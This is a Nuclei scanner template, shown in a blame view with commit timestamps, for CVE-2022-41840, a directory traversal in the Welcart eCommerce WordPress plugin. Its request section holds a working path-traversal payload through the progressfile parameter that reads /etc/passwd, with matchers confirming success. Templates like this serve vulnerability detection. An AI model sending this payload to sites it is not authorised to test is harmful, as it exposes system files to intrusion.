nuclei-templates/cves/2022/CVE-2022-41840.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2022-10-22 13:43:27 +00:00
id: CVE-2022-41840
info:
2022-10-22 22:24:28 +00:00
name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
2022-10-22 13:43:27 +00:00
author: theamanrawat
severity: critical
description: |
Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress.
2022-10-22 13:43:27 +00:00
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve
2022-10-22 13:43:27 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-10-22 13:43:27 +00:00
cve-id: CVE-2022-41840
cwe-id: CWE-22
2022-10-22 13:43:27 +00:00
metadata:
verified: "true"
2022-10-24 13:01:23 +00:00
tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
2022-10-22 13:43:27 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
2022-10-22 22:24:28 +00:00
matchers-condition: and
2022-10-22 13:43:27 +00:00
matchers:
- type: regex
2022-10-22 22:24:28 +00:00
part: body
2022-10-22 13:43:27 +00:00
regex:
- "root:.*:0:0:"
2022-10-22 22:24:28 +00:00
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200